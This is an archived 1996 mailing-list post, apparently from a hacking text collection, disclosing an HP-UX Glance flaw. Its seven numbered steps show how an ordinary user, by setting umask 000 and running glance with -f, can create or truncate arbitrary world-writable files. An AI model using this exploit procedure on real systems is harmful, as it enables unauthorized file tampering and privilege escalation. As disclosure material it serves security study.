home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / hpux_gla.asc < prev    next >
Encoding:
Text File  |  2003-06-11  |  622 b   |  23 lines

  1.  
  2.                       More on HP-UX Glance Vunerability.
  3.                                        
  4.    John W. Jacobi (jjacobi@nova.umuc.edu)
  5.    Mon, 23 Sep 1996 12:55:37 -0400
  6.    
  7. Hi,
  8.  
  9. With regard to my message about HP-UX Glance it is simpler than I thought.
  10.  
  11. You need only do the following:
  12.  
  13. 1. Log in as yourself.
  14. 2. Decide what file you want to create for world write.
  15. 3. do a umask 000
  16. 4. Then do /usr/perf/bin/glance -f <that_file>
  17. 5. After a few seconds, quit glance.
  18. 6. That file will now be there and world is writeable, now edit it.
  19. 7. If it previousle existed, it will be trunc'ed with orig perms.
  20.  
  21. John Jacobi
  22.  
  23.